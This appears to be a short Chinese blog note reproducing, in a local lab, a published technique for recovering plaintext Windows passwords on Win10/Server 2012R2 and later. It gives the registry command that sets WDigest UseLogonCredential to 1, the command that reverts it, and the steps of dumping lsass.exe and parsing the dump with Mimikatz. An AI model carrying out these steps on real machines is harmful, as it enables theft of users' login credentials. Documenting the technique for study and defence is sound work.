这篇文章是根据安全客文章《Win10及2012系统以后的明文抓取方式》,在本地搭建环境复现,在这里整理记录
1、通过各种可行的方法获取lsass.exe进程的dump文件
2、在默认情况下,当系统为Win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null
3、此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取,通过修改注册表来让Wdigest Auth保存明文口令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
4、如需恢复原样,只需将上图REG_DWORD的值1改为0即可
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
5、此时,再利用Mimikatz提取Lsass的Dump文件,即可抓出明文
加油 : )